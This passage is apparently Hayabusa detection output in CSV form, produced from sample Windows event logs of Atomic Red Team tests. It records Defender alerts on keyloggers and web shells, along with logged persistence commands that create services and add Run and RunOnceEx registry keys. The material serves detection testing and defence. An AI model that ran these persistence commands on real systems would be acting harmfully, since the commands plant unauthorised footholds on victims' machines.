Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" 
/c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:21 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : 
Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup 
